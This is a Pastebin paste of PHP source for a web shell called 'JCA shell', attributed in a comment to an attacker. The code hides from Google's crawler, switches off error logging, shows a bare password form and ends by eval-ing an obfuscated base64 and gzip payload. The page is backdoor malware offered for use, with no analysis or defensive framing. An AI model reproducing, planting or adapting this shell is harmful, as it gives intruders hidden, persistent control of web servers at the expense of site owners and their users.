Advertisement
1337_Brain

JCA shell

Jul 8th, 2014
496
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 1.69 KB | None | 0 0
  1. <?php
  2. /* (Web Shell 1n73ction r3c0d3d by ismail attacker |default pass:" javacyber ") */
  3. $auth_pass = "6138f95a7e66e7373c8d770ad348d13c";
  4. $color = "#008B8B";
  5. $default_action = 'FilesMan';
  6. @define('SELF_PATH', __FILE__);
  7. if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
  8.     header('HTTP/1.0 404 Not Found');
  9.     exit;
  10. }
  11. @session_start();
  12. @error_reporting(0);
  13. @ini_set('error_log', NULL);
  14. @ini_set('log_errors', 0);
  15. @ini_set('max_execution_time', 0);
  16. @ini_set('output_buffering', 0);
  17. @ini_set('display_errors', 0);
  18. @set_time_limit(0);
  19. @set_magic_quotes_runtime(0);
  20. @define('VERSION', '2.1');
  21. if (get_magic_quotes_gpc()) {
  22.     function stripslashes_array($array) {
  23.         return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
  24.     }
  25.     $_POST = stripslashes_array($_POST);
  26. }
  27. function printLogin() {
  28. ?>
  29. <TITLE>[#] Nabilah Dot ID ( JCA shell )</TITLE>
  30. <body BGCOLOR="black">
  31. <p><center><img src="http://s12.postimg.org/8h0rau6d9/coollogo_com_161484773.png" width="405" height="120"></center>
  32. <hr>
  33. <address></address>
  34. <style>
  35.         input { margin:0;background-color:#fff;border:1px solid #fff; }
  36.     </style>
  37.     <center>
  38.     <form method=post >
  39.     <input type=password name=pass >
  40.     </form></center>
  41.     <?php
  42.     exit;
  43. }
  44. if (!isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
  45. else printLogin();
  46. eval(gzuncompress(base64_decode("eNpTKU4uyiwoUbBVSMvMSY1PTy2JT87PK0nNKynWUM8oKSmw0tcvSCwuSU3KzNNLzs/VL0os1yvIKLDPtC3LDnMPCCg3Ude05uVKLUvM0UivysxLy0ksSdVISixONTOJT0lNzk9J1VCBWKKpqWkNANFIJwc="))); ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement